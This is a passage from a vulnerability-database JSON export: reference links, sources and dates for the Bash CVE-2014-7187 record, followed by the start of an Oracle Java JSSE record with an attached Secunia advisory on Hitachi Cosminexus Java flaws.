}, { "trust": 1.1, "url": "http://secunia.com/advisories/61065" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61550" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61855" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61312" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60063" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61291" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60044" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 1.1, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673\u0026src=securityalerts" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60433" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60024" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383304022067\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383244821813\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-10/msg00025.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141450491804793\u0026w=2" }, { "trust": 1.1, "url": "http://jvn.jp/en/jp/jvn55667175/index.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383081521087\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383138121313\u0026w=2" }, { "trust": 1.1, "url": "http://www.qnap.com/i/en/support/con_show.php?cid=61" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383026420882\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html" }, { "trust": 1.1, "url": "http://jvndb.jvn.jp/jvndb/jvndb-2014-000126" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141383196021590\u0026w=2" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-1354.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61873" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577241923505\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141576728022234\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577297623641\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141577137423233\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141585637922673\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141694386919794\u0026w=2" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62343" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62312" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/jan/msg00003.html" }, { "trust": 1.1, "url": "http://support.apple.com/ht204244" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358026505815\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142358078406056\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142289270617409\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141879528318582\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721162228379\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:164" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00008.html" }, { "trust": 1.1, "url": "https://support.apple.com/ht205267" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04518183" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c04497075" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/533593/100/0/threaded" }, { "trust": 1.0, "url": "https://access.redhat.com/articles/1200223" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6271" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-7187" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.9, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.9, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/650" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/688" }, { "trust": 0.8, "url": "http://seclists.org/oss-sec/2014/q3/685" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html" }, { "trust": 0.8, "url": "https://gist.github.com/anonymous/929d622f3b36b00c0be1" }, { "trust": 0.8, "url": "https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html" }, { "trust": 0.8, "url": "https://shellshocker.net/#" }, { "trust": 0.8, "url": "http://support.apple.com/kb/ht6495" }, { "trust": 0.8, "url": "https://www.barracuda.com/support/techalerts" }, { "trust": 0.8, "url": "http://www.checkpoint.com/blog/protecting-shellshock/index.html" }, { "trust": 0.8, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10044" }, { "trust": 0.8, "url": "https://www.debian.org/security/2014/dsa-3032" }, { "trust": 0.8, "url": "http://learn.extremenetworks.com/rs/extreme/images/vn-2014-001-%20gnu%20bash%20threats%20-cve-2014-7169%20rev01.pdf" }, { "trust": 0.8, "url": "http://fedoramagazine.org/shellshock-update-bash-packages-that-resolve-cve-2014-6271-and-cve-2014-7169-available/" }, { "trust": 0.8, "url": "http://www.fortiguard.com/advisory/fg-ir-14-030/" }, { "trust": 0.8, "url": "http://www.gentoo.org/security/en/glsa/glsa-201409-09.xml" }, { "trust": 0.8, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.15ee22.l8mgqe..n.ghvs.8f9a.bw89mq%5f%5fdbosfqk0" }, { "trust": 0.8, "url": "http://kb.juniper.net/jsa10648" }, { "trust": 0.8, "url": "http://jpn.nec.com/security-info/av14-003.html" }, { "trust": 0.8, "url": "http://support.novell.com/security/cve/cve-2014-6271.html" }, { "trust": 0.8, "url": "https://www.suse.com/support/kb/doc.php?id=7015702" }, { "trust": 0.8, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2014\u0026m=slackware-security.522193" }, { "trust": 0.8, "url": "http://www.ubuntu.com/usn/usn-2362-1/" }, { "trust": 0.8, "url": "http://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2090740" }, { "trust": 0.8, "url": "http://pkgsrc.se/files.php?messageid=20140925202832.9ad9c98@cvs.netbsd.org" }, { "trust": 0.8, "url": "https://www.jpcert.or.jp/at/2014/at140037.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96447236/index.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-000126.html" }, { "trust": 0.8, "url": "https://www.us-cert.gov/ncas/alerts/ta14-268a" }, { "trust": 0.8, "url": "http://www.aratana.jp/security/detail.php?id=10" }, { "trust": 0.8, "url": "http://lcamtuf.blogspot.jp/2014/09/bash-bug-apply-unofficial-patch-now.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004399.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004410.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004431.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004476.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004432.html" }, { "trust": 0.8, "url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-004433.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-7169" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6271" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6277" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6278" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-7186" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-344-01" }, { "trust": 0.8, "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-269-01a" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6277" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6278" }, { "trust": 0.3, "url": "http://www.gnu.org/software/bash/" }, { "trust": 0.3, "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk102673" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb83017" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2014/q3/735" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/10/stable-channel-update-for-chrome-os.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004932" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686433" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1021361" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686494" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686445" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004903" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686479" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075" }, { "trust": 0.3, "url": "http://seclists.org/fulldisclosure/2014/oct/25" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04552143" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10661\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183066" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183009" }, { "trust": 0.3, "url": "https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00000.html" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paps5" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183222" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04477872" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907 " }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/76" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/77" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04479974" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptm" }, { "trust": 0.3, "url": "http://www.kb.cert.org/vuls/id/bluu-9paptz" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-1306.html" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686447" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685873" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686132" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686024" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686037" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686171" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686098" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685875" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685541" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687971" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100183088" }, { "trust": 0.3, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-7187" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2104-6277" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2104-6278" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://www.securityfocus.com/bid/70154" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35861" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2364-1/" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/36933/" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-7169" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1865.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-7186" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/km01194258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7169.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7186.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-7187.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-7169" }, { "trust": 0.1, "url": "https://www.vmware.com/go/download-vcenter-log-insight" }, { "trust": 0.1, "url": "https://twitter.com/vmwaresrc" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/lifecycle.html" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/2091065" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/2090740" }, { "trust": 0.1, "url": "http://kb.vmware.com/kb/1055" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-7186" }, { "trust": 0.1, "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce" }, { "trust": 0.1, "url": "http://www.vmware.com/security/advisories" }, { "trust": 0.1, "url": "https://www.vmware.com/support/policies/security_response.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "BID", "id": "70154" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128864" }, { "db": "PACKETSTORM", "id": "128752" }, { "db": "PACKETSTORM", "id": "128666" }, { "db": "PACKETSTORM", "id": "129132" }, { "db": "PACKETSTORM", "id": "129264" }, { "db": "PACKETSTORM", "id": "128763" }, { "db": "PACKETSTORM", "id": "129095" }, { "db": "PACKETSTORM", "id": "130335" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128517" }, { "db": "PACKETSTORM", "id": "128755" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7187" }, { "db": "BID", "id": "70154" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128864" }, { "db": "PACKETSTORM", "id": "128752" }, { "db": "PACKETSTORM", "id": "128666" }, { "db": "PACKETSTORM", "id": "129132" }, { "db": "PACKETSTORM", "id": "129264" }, { "db": "PACKETSTORM", "id": "128763" }, { "db": "PACKETSTORM", "id": "129095" }, { "db": "PACKETSTORM", "id": "130335" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "PACKETSTORM", "id": "128517" }, { "db": "PACKETSTORM", "id": "128755" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "db": "NVD", "id": "CVE-2014-7187" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-25T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2014-09-28T00:00:00", "db": "VULMON", "id": "CVE-2014-7187" }, { "date": "2014-09-25T00:00:00", "db": "BID", "id": "70154" }, { "date": "2014-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "date": "2014-10-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "date": "2015-03-24T17:07:02", "db": "PACKETSTORM", "id": "130988" }, { "date": "2014-10-27T23:44:00", "db": "PACKETSTORM", "id": "128864" }, { "date": "2014-10-20T13:14:00", "db": "PACKETSTORM", "id": "128752" }, { "date": "2014-10-14T23:07:16", "db": "PACKETSTORM", "id": "128666" }, { "date": "2014-11-17T23:31:07", "db": "PACKETSTORM", "id": "129132" }, { "date": "2014-11-26T15:07:58", "db": "PACKETSTORM", "id": "129264" }, { "date": "2014-10-20T17:55:00", "db": "PACKETSTORM", "id": "128763" }, { "date": "2014-11-13T17:15:31", "db": "PACKETSTORM", "id": "129095" }, { "date": "2015-02-10T17:43:19", "db": "PACKETSTORM", "id": "130335" }, { "date": "2014-09-27T16:45:44", "db": "PACKETSTORM", "id": "128456" }, { "date": "2014-10-01T22:22:00", "db": "PACKETSTORM", "id": "128517" }, { "date": "2014-10-20T14:02:00", "db": "PACKETSTORM", "id": "128755" }, { "date": "2014-09-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "date": "2014-09-28T19:55:06.270000", "db": "NVD", "id": "CVE-2014-7187" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-14T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2018-10-09T00:00:00", "db": "VULMON", "id": "CVE-2014-7187" }, { "date": "2015-11-03T19:52:00", "db": "BID", "id": "70154" }, { "date": "2015-12-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "date": "2024-07-18T02:27:00", "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "date": "2014-09-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-1073" }, { "date": "2018-10-09T19:52:54.273000", "db": "NVD", "id": "CVE-2014-7187" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "129132" }, { "db": "PACKETSTORM", "id": "128456" }, { "db": "CNNVD", "id": "CNNVD-201409-1073" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "GNU Bash shell executes commands in exported functions in environment variables", "sources": [ { "db": "CERT/CC", "id": "VU#252743" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-1073" } ], "trust": 0.6 } }
var-201302-0253
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11, 6 through Update 38, 5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 7, allows remote attackers to affect availability via vectors related to JSSE. NOTE: the previous information is from the February 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to CPU consumption in the SSL/TLS implementation via a large number of ClientHello packets that are not properly handled by (1) ClientHandshaker.java and (2) ServerHandshaker.java. The vulnerability can be exploited over the 'SSL/TLS' protocol. This issue affects the 'JSSE' sub-component. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: Hitachi Cosminexus Products Java Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA43627
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43627/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43627
RELEASE DATE: 2011-03-08
DISCUSS ADVISORY: http://secunia.com/advisories/43627/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43627/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43627
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Hitachi has acknowledged some vulnerabilities in Hitachi Cosminexus products, which can be exploited by malicious people to disclose potentially sensitive information, manipulate certain data, cause a DoS (Denial of Service), and compromise a vulnerable system.
The vulnerabilities are caused due to vulnerabilities in the bundled version of Cosminexus Developer's Kit for Java.
For more information: SA43262
Please see the vendor's advisory for a full list of affected products.
SOLUTION: Update to a fixed version. Please see vendor advisory for more details.
ORIGINAL ADVISORY: Hitachi (English): http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS11-003/index.html
Hitachi (Japanese): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/./vuls/HS11-003/index.html
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
